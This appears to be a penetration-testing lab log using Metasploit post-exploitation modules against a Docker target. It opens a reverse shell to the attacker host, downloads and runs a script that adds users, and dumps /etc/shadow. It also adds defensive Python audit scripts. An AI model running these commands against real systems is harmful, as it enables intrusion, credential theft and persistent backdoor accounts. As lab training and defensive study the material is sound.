-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
8 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.111.31.3 192.111.31.2:4433 -> 192.111.31.3:60722 (192.111.31.3)
msf5 post(multi/gather/env) > set SESSION 8
SESSION => 8
msf5 post(multi/gather/env) > run
[*] Debian 8.11 (Linux 5.4.0-125-generic)
[*] Post module execution completed
msf5 post(multi/gather/env) > search enum_network
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_network normal No Linux Gather Network Information
msf5 post(multi/gather/env) > use post/linux/gather/enum_network
msf5 post(linux/gather/enum_network) > show options
Module options (post/linux/gather/enum_network):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_network) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_network) > run
[*] Running module against 192.111.31.3
[*] Module running as root
[+] Info:
[+] Debian GNU/Linux 8
[+] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[*] Collecting data...
[-] Failed to open file: /etc/ssh/sshd_config: core_channel_open: Operation failed: 1
[-] Unable to get data for Network config
[-] Unable to get data for Route table
[+] Firewall config stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_061534.txt
[+] DNS config stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_739761.txt
[-] Unable to get data for SSHD config
[+] Host file stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_419887.txt
[+] SSH keys stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_913508.txt
[-] Unable to get data for Active connections
[-] Unable to get data for Wireless information
[-] Unable to get data for Listening ports
[+] If-Up/If-Down stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_777079.txt
[*] Post module execution completed
msf5 post(linux/gather/enum_network) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.111.31.3 linux.enum.network text/plain Firewall config /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_061534.txt
192.111.31.3 linux.enum.network text/plain DNS config /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_739761.txt
192.111.31.3 linux.enum.network text/plain Host file /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_419887.txt
192.111.31.3 linux.enum.network text/plain SSH keys /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_913508.txt
192.111.31.3 linux.enum.network text/plain If-Up/If-Down /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_777079.txt
msf5 post(linux/gather/enum_network) > cat /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_739761.txt
[*] exec: cat /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_739761.txt
search members.linode.com
nameserver 127.0.0.11
options edns0 trust-ad ndots:0
msf5 post(linux/gather/enum_network) > search enum_protections
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_protections normal No Linux Gather Protection Enumeration
msf5 post(linux/gather/enum_network) > use post/linux/gather/enum_protections
msf5 post(linux/gather/enum_protections) > show options
Module options (post/linux/gather/enum_protections):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_protections) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_protections) > run
[*] Running module against 192.111.31.3 [victim-1]
[*] Info:
[*] Debian GNU/Linux 8
[*] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[*] Finding system protections...
[+] ASLR is enabled
[+] SMEP is enabled
[+] SMAP is enabled
[+] Yama is installed and enabled
[*] Finding installed applications...
[+] iptables found: /sbin/iptables
[+] tcpdump found: /usr/sbin/tcpdump
[+] wireshark found: /usr/bin/wireshark
[*] System protections saved to notes.
[*] Post module execution completed
msf5 post(linux/gather/enum_protections) > notes
Notes
=====
Time Host Service Port Protocol Type Data
---- ---- ------- ---- -------- ---- ----
2023-03-10 14:46:19 UTC 192.111.31.3 host.os.session_fingerprint {:name=>"192.111.31.3", :os=>"Debian 8.11 (Linux 5.4.0-125-generic)", :arch=>"x64"}
2023-03-10 15:35:18 UTC 192.111.31.3 linux.protection "ASLR is enabled"
2023-03-10 15:35:18 UTC 192.111.31.3 linux.protection "SMEP is enabled"
2023-03-10 15:35:19 UTC 192.111.31.3 linux.protection "SMAP is enabled"
2023-03-10 15:35:19 UTC 192.111.31.3 linux.protection "Yama is installed and enabled"
2023-03-10 15:35:21 UTC 192.111.31.3 linux.protection "/sbin/iptables"
2023-03-10 15:35:26 UTC 192.111.31.3 linux.protection "/usr/sbin/tcpdump"
2023-03-10 15:35:29 UTC 192.111.31.3 linux.protection "/usr/bin/wireshark"
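The four findings enum_protections records above come from a handful of kernel interfaces, and it is useful to know where they live so the same audit can be run on a host without Metasploit. The script below is an added example, not the module's code: it reads /proc/sys/kernel/randomize_va_space for ASLR, the flags line of /proc/cpuinfo for SMEP and SMAP, and /proc/sys/kernel/yama/ptrace_scope for Yama, and treats any missing or unreadable file as "unknown" rather than failing. The sample cpuinfo fragment is constructed.

```python
"""Offline check of the host protections that post/linux/gather/enum_protections
reported above (ASLR, SMEP, SMAP, Yama). Added example, not Metasploit's module
code; it reads /proc/sys/kernel/randomize_va_space, the flags line of
/proc/cpuinfo and /proc/sys/kernel/yama/ptrace_scope."""
from typing import Dict, Optional, Set


def read_text(path: str) -> Optional[str]:
    """Return a file's contents, or None when it is missing or unreadable
    (restricted /proc entries inside containers are a common case)."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def aslr_status(randomize_va_space: Optional[str]) -> str:
    """Map randomize_va_space to its meaning: 0 off, 1 partial, 2 full."""
    if randomize_va_space is None:
        return "unknown"
    levels = {"0": "disabled", "1": "partial", "2": "full"}
    return levels.get(randomize_va_space.strip(), "unknown")


def cpu_flags(cpuinfo: Optional[str]) -> Set[str]:
    """Return the feature flags on the first 'flags' line of /proc/cpuinfo."""
    if cpuinfo is None:
        return set()
    for line in cpuinfo.splitlines():
        if line.startswith("flags"):
            return set(line.partition(":")[2].split())
    return set()


def yama_status(ptrace_scope: Optional[str]) -> str:
    """Map Yama's ptrace_scope to its meaning; a missing file means Yama is absent."""
    if ptrace_scope is None:
        return "not installed"
    scopes = {
        "0": "classic ptrace",
        "1": "restricted ptrace (descendants only)",
        "2": "admin-only attach",
        "3": "no attach",
    }
    return scopes.get(ptrace_scope.strip(), "unknown")


def summarize(randomize_va_space: Optional[str], cpuinfo: Optional[str],
              ptrace_scope: Optional[str]) -> Dict[str, object]:
    """Combine the three readings into one report; every input may be None."""
    flags = cpu_flags(cpuinfo)
    return {
        "aslr": aslr_status(randomize_va_space),
        "smep": "smep" in flags,
        "smap": "smap" in flags,
        "yama": yama_status(ptrace_scope),
    }


def audit_live_system() -> Dict[str, object]:
    """Read the real kernel interfaces on the host this script runs on."""
    return summarize(
        read_text("/proc/sys/kernel/randomize_va_space"),
        read_text("/proc/cpuinfo"),
        read_text("/proc/sys/kernel/yama/ptrace_scope"),
    )


# Constructed sample cpuinfo fragment, matching the enum_protections findings above.
SAMPLE_CPUINFO = "processor\t: 0\nflags\t\t: fpu vme pae nx smep smap\n"

if __name__ == "__main__":
    for key, value in audit_live_system().items():
        print(f"{key}: {value}")
```

Run it as root or as an ordinary user; all three files are world-readable on a normal host. A result of "unknown" for ASLR on a container usually means /proc/sys was mounted read-restricted, which is the same condition that makes several of the Metasploit modules above print "Failed to open file".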
msf5 post(linux/gather/enum_protections) > search enum_system
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_system normal No Linux Gather System and User Information
msf5 post(linux/gather/enum_protections) > use post/linux/gather/enum_system
msf5 post(linux/gather/enum_system) > show options
Module options (post/linux/gather/enum_system):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_system) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_system) > run
[+] Info:
[+] Debian GNU/Linux 8
[+] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[+] Module running as "root" user
[*] Linux version stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_023977.txt
[*] User accounts stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_505181.txt
[*] Installed Packages stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_504764.txt
[*] Running Services stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_981652.txt
[*] Cron jobs stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_602329.txt
[*] Disk info stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_230170.txt
[*] Logfiles stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_029298.txt
[*] Setuid/setgid files stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_921402.txt
[*] Post module execution completed
msf5 post(linux/gather/enum_system) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.111.31.3 linux.enum.system text/plain Linux version /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_023977.txt
192.111.31.3 linux.enum.system text/plain User accounts /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_505181.txt
192.111.31.3 linux.enum.system text/plain Installed Packages /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_504764.txt
192.111.31.3 linux.enum.system text/plain Running Services /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_981652.txt
192.111.31.3 linux.enum.system text/plain Cron jobs /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_602329.txt
192.111.31.3 linux.enum.system text/plain Disk info /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_230170.txt
192.111.31.3 linux.enum.system text/plain Logfiles /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_029298.txt
192.111.31.3 linux.enum.system text/plain Setuid/setgid files /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_921402.txt
msf5 post(linux/gather/enum_system) > search checkcontainer
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/checkcontainer normal No Linux Gather Container Detection
msf5 post(linux/gather/enum_system) > use post/linux/gather/checkcontainer
msf5 post(linux/gather/checkcontainer) > show options
Module options (post/linux/gather/checkcontainer):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/checkcontainer) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/checkcontainer) > run
[+] This appears to be a 'Docker' container
[*] Post module execution completed
msf5 post(linux/gather/checkcontainer) > search checkvm
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/checkvm normal No Linux Gather Virtual Environment Detection
2 post/solaris/gather/checkvm normal No Solaris Gather Virtual Environment Detection
3 post/windows/gather/checkvm normal No Windows Gather Virtual Environment Detection
msf5 post(linux/gather/checkcontainer) > use post/linux/gather/checkvm
msf5 post(linux/gather/checkvm) > show options
Module options (post/linux/gather/checkvm):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/checkvm) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/checkvm) > run
[*] Gathering System info ....
[-] Failed to open file: /proc/scsi/scsi: core_channel_open: Operation failed: 1
[-] Post failed: NoMethodError undefined method `gsub' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/linux/gather/checkvm.rb:74:in `run'
[*] Post module execution completed
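The checkvm failure above is instructive: inside the Docker container /proc/scsi/scsi cannot be opened, the module gets nil back, and calling gsub on it raises NoMethodError. The script below is an added example (not checkcontainer's or checkvm's code) of the same two detections written so that every source is optional: /.dockerenv and /proc/1/cgroup for containers, /proc/scsi/scsi and /sys/class/dmi/id/product_name for hypervisors, with unreadable files skipped instead of crashing. The choice of sources and the marker table are this example's own assumptions.

```python
"""Container and hypervisor detection that tolerates missing /proc and /sys
entries, the condition that crashed checkvm above. Added example, not
Metasploit code; the sources consulted are this example's own choice."""
import os
from typing import Optional, Tuple

# Substrings that identify a hypervisor in SCSI or DMI strings (case-insensitive).
HYPERVISOR_MARKERS = (
    ("vmware", "VMware"),
    ("virtualbox", "VirtualBox"),
    ("innotek", "VirtualBox"),
    ("qemu", "QEMU/KVM"),
    ("kvm", "QEMU/KVM"),
    ("xen", "Xen"),
    ("microsoft corporation", "Hyper-V"),
)


def read_text(path: str) -> Optional[str]:
    """Return file contents, or None when the path is missing or unreadable."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def detect_container(dockerenv_present: bool, cgroup: Optional[str]) -> Optional[str]:
    """Return the container runtime name, or None when nothing indicates one.
    cgroup is the text of /proc/1/cgroup, or None if it could not be read."""
    if dockerenv_present:
        return "Docker"
    if cgroup:
        low = cgroup.lower()
        if "docker" in low:
            return "Docker"
        if "kubepods" in low:
            return "Kubernetes"
        if "lxc" in low:
            return "LXC"
    return None


def detect_hypervisor(*sources: Optional[str]) -> Optional[str]:
    """Scan every readable source string for a hypervisor marker; None sources
    (the unreadable-file case) are skipped rather than dereferenced."""
    for text in sources:
        if not text:
            continue
        low = text.lower()
        for marker, name in HYPERVISOR_MARKERS:
            if marker in low:
                return name
    return None


def detect_live() -> Tuple[Optional[str], Optional[str]]:
    """Run both detections against the host this script executes on."""
    container = detect_container(os.path.exists("/.dockerenv"), read_text("/proc/1/cgroup"))
    hypervisor = detect_hypervisor(
        read_text("/proc/scsi/scsi"),
        read_text("/sys/class/dmi/id/product_name"),
    )
    return container, hypervisor


if __name__ == "__main__":
    container, hypervisor = detect_live()
    print(f"container: {container or 'none detected'}")
    print(f"hypervisor: {hypervisor or 'none detected'}")
```

On the lab target this reports Docker and no hypervisor, because the DMI directory is not exposed to the container either; the point is that an absent source yields "none detected" rather than a stack trace.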
msf5 post(linux/gather/checkvm) > search enum_users_history
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_users_history normal No Linux Gather User History
msf5 post(linux/gather/checkvm) > use post/linux/gather/enum_users_history
msf5 post(linux/gather/enum_users_history) > show options
Module options (post/linux/gather/enum_users_history):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_users_history) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_users_history) > run
[+] Info:
[+] Debian GNU/Linux 8
[+] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[-] Failed to open file: /root/.ash_history: core_channel_open: Operation failed: 1
[+] bash history for root stored in /root/.msf4/loot/20230310155132_Linux_PE_192.111.31.3_linux.enum.users_721206.txt
[-] Failed to open file: /root/.csh_history: core_channel_open: Operation failed: 1
[-] Failed to open file: /root/.ksh_history: core_channel_open: Operation failed: 1
[-] Failed to open file: /var/lib/usbmux/.viminfo: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/sudoers: core_channel_open: Operation failed: 1
[+] Last logs stored in /root/.msf4/loot/20230310155201_Linux_PE_192.111.31.3_linux.enum.users_298782.txt
[*] Post module execution completed
msf5 post(linux/gather/enum_users_history) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.111.31.3 linux.enum.users text/plain bash history for root /root/.msf4/loot/20230310155132_Linux_PE_192.111.31.3_linux.enum.users_721206.txt
192.111.31.3 linux.enum.users text/plain Last logs /root/.msf4/loot/20230310155201_Linux_PE_192.111.31.3_linux.enum.users_298782.txt
msf5 post(linux/gather/enum_users_history) > cat /root/.msf4/loot/20230310155132_Linux_PE_192.111.31.3_linux.enum.users_721206.txt
[*] exec: cat /root/.msf4/loot/20230310155132_Linux_PE_192.111.31.3_linux.enum.users_721206.txt
whoami
cat /etc/passwd
groups root
cat /etc/*issue
unmae -r
uname -r
uname -a
ifconfig
ip a s
netstat -antp
ps aux
env
I restarted the lab and added the last two modules:
Kali: 192.141.94.2
Target: 192.141.94.3
msf5 post(linux/gather/enum_users_history) > use post/multi/manage/system_session
msf5 post(multi/manage/system_session) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 shell cmd/unix 192.141.94.2:45369 -> 192.141.94.3:445 (192.141.94.3)
7 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.141.94.3 192.141.94.2:4433 -> 192.141.94.3:49134 (192.141.94.3)
msf5 post(multi/manage/system_session) > set SESSION 6
SESSION => 6
msf5 post(multi/manage/system_session) > info
Name: Multi Manage System Remote TCP Shell Session
Module: post/multi/manage/system_session
Platform: Linux, OSX, Unix
Arch:
Rank: Normal
Provided by:
Carlos Perez <carlos_perez@darkoperator.com>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false yes Start an exploit/multi/handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
SESSION 6 yes The session to run this module on.
TYPE auto yes Scripting environment on target to use for reverse shell (Accepted: auto, ruby, python, perl, bash)
Description:
This module will create a Reverse TCP Shell on the target system
using the system's own scripting environments installed on the
target.
msf5 post(multi/manage/system_session) > set HANDLER true
HANDLER => true
msf5 post(multi/manage/system_session) > set LHOST 192.141.94.2
LHOST => 192.141.94.2
msf5 post(multi/manage/system_session) > set LPORT 4444
LPORT => 4444
msf5 post(multi/manage/system_session) > set TYPE python
TYPE => python
msf5 post(multi/manage/system_session) > run
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.141.94.2:4444
[*] Python reverse shell selected
[*] Executing reverse tcp shell to 192.141.94.2 on port 4444
[*] Post module execution completed
msf5 post(multi/manage/system_session) > [*] Command shell session 8 opened (192.141.94.2:4444 -> 192.141.94.3:52896) at 2023-03-11 03:49:23 +0000
msf5 post(multi/manage/system_session) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 shell cmd/unix 192.141.94.2:45369 -> 192.141.94.3:445 (192.141.94.3)
7 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.141.94.3 192.141.94.2:4433 -> 192.141.94.3:49134 (192.141.94.3)
8 shell sparc/bsd /bin/sh: 0: can't access tty; job control turned off # 192.141.94.2:4444 -> 192.141.94.3:52896 (192.141.94.3)
msf5 post(multi/manage/system_session) > echo "useradd hacker\nuseradd test\nuseradd nick" > test.sh
[*] exec: echo "useradd hacker\nuseradd test\nuseradd nick" > test.sh
msf5 post(multi/manage/system_session) > pwd
[*] exec: pwd
/root
msf5 post(multi/manage/system_session) > cat test.sh
[*] exec: cat test.sh
useradd hacker
useradd test
useradd nick
msf5 post(multi/manage/system_session) > /etc/init.d/apache2 start
[*] exec: /etc/init.d/apache2 start
Starting Apache httpd web server: apache2.
msf5 post(multi/manage/system_session) > cp test.sh /var/www/html/
[*] exec: cp test.sh /var/www/html/
msf5 post(linux/manage/download_exec) > curl http://192.141.94.2/test.sh
[*] exec: curl http://192.141.94.2/test.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 41 100 41 0 0 20500 0 --:--:-- --:--:-- --:--:-- 20500
useradd hacker
useradd test
useradd nick
msf5 post(multi/manage/system_session) > use post/linux/manage/download_exec
msf5 post(linux/manage/download_exec) > info
Name: Linux Manage Download and Execute
Module: post/linux/manage/download_exec
Platform: Linux
Arch:
Rank: Normal
Provided by:
Joshua D. Abraham <jabra@praetorian.com>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
URL yes Full URL of file to download.
Description:
This module downloads and runs a file with bash. It first tries to
uses curl as its HTTP client and then wget if it's not found. Bash
found in the PATH is used to execute the file.
msf5 post(linux/manage/download_exec) > set SESSION 7
SESSION => 7
msf5 post(linux/manage/download_exec) > set URL http://192.141.94.2/test.sh
URL => http://192.141.94.2/test.sh
msf5 post(linux/manage/download_exec) > run
[*] Checking if curl exists in the path...
[*] Checking if wget exists in the path...
[!] neither curl nor wget available in the $PATH, aborting...
[*] Post module execution completed
msf5 post(linux/manage/download_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 shell cmd/unix 192.141.94.2:45369 -> 192.141.94.3:445 (192.141.94.3)
7 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.141.94.3 192.141.94.2:4433 -> 192.141.94.3:49134 (192.141.94.3)
8 shell sparc/bsd /bin/sh: 0: can't access tty; job control turned off # 192.141.94.2:4444 -> 192.141.94.3:52896 (192.141.94.3)
msf5 post(linux/manage/download_exec) > set SESSION 6
SESSION => 6
msf5 post(linux/manage/download_exec) > run
[!] SESSION may not be compatible with this module.
[*] Checking if curl exists in the path...
[+] curl available, using it
[*] Checking if bash exists in the path...
[+] bash available, using it
[*] Post module execution completed
msf5 post(linux/manage/download_exec) > sessions 6
[*] Starting interaction with 6...
cat /etc/shadow
root:*:17774:0:99999:7:::
daemon:*:17774:0:99999:7:::
bin:*:17774:0:99999:7:::
sys:*:17774:0:99999:7:::
sync:*:17774:0:99999:7:::
games:*:17774:0:99999:7:::
man:*:17774:0:99999:7:::
lp:*:17774:0:99999:7:::
mail:*:17774:0:99999:7:::
news:*:17774:0:99999:7:::
uucp:*:17774:0:99999:7:::
proxy:*:17774:0:99999:7:::
www-data:*:17774:0:99999:7:::
backup:*:17774:0:99999:7:::
list:*:17774:0:99999:7:::
irc:*:17774:0:99999:7:::
gnats:*:17774:0:99999:7:::
nobody:*:17774:0:99999:7:::
systemd-timesync:*:17774:0:99999:7:::
systemd-network:*:17774:0:99999:7:::
systemd-resolve:*:17774:0:99999:7:::
systemd-bus-proxy:*:17774:0:99999:7:::
messagebus:*:17812:0:99999:7:::
colord:*:17812:0:99999:7:::
saned:*:17812:0:99999:7:::
usbmux:*:17812:0:99999:7:::
hacker:!:19427:0:99999:7:::
test:!:19427:0:99999:7:::
nick:!:19427:0:99999:7:::
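The shadow dump above shows the three accounts the downloaded script created: their third field (days since 1970-01-01 of the last password change) is 19427, which is 2023-03-11, the same day the session log shows, while every original account sits at 17774 or 17812 (2018). That field is a cheap indicator for a defender reviewing a host or a loot file. The script below is an added example, not part of the page's tooling: it parses shadow lines, converts the day counter to a date, classifies the password field, and lists accounts changed after a baseline date. The baseline is an assumption standing in for the image build date, and the sample lines are a constructed subset of the dump.

```python
"""Review an /etc/shadow dump for accounts created after a known baseline.
Added example, not from the page's tooling. BASELINE is an assumed image build
date; SAMPLE_SHADOW is a constructed subset of the dump above."""
from datetime import date, timedelta
from typing import Dict, List, Optional, Tuple

EPOCH = date(1970, 1, 1)


def shadow_day_to_date(days: str) -> Optional[date]:
    """Field 3 of /etc/shadow is the last password change as days since
    1970-01-01; an empty field means the date is unknown."""
    return EPOCH + timedelta(days=int(days)) if days.isdigit() else None


def classify_hash(field: str) -> str:
    """Interpret the password field: empty means no password is required."""
    if field == "":
        return "empty"
    if field in ("*", "!", "!!"):
        return "locked"
    if field.startswith("!"):
        return "locked (hash retained)"
    return "set"


def parse_shadow(text: str) -> List[Dict[str, object]]:
    """Parse shadow lines into dicts; malformed or blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 9 or not fields[0]:
            continue
        entries.append({
            "name": fields[0],
            "password": classify_hash(fields[1]),
            "lastchg": shadow_day_to_date(fields[2]),
        })
    return entries


def find_new_accounts(text: str, baseline: date) -> List[Tuple[str, str, str]]:
    """Return (name, password state, change date) for accounts whose password
    field changed after the baseline, i.e. accounts likely created since then."""
    hits = []
    for entry in parse_shadow(text):
        changed = entry["lastchg"]
        if changed is not None and changed > baseline:
            hits.append((entry["name"], entry["password"], changed.isoformat()))
    return hits


# Constructed subset of the dump above.
SAMPLE_SHADOW = """root:*:17774:0:99999:7:::
usbmux:*:17812:0:99999:7:::
hacker:!:19427:0:99999:7:::
test:!:19427:0:99999:7:::
nick:!:19427:0:99999:7:::
"""

# Assumed baseline: the last date the image was known good.
BASELINE = date(2022, 12, 31)

if __name__ == "__main__":
    for name, state, changed in find_new_accounts(SAMPLE_SHADOW, BASELINE):
        print(f"{name}: password {state}, changed {changed}")
```

Accounts created with a bare useradd get "!" in the password field, which this reports as "locked"; that is why the three new accounts cannot log in with a password yet, and also why a review that only looks for usable hashes would miss them.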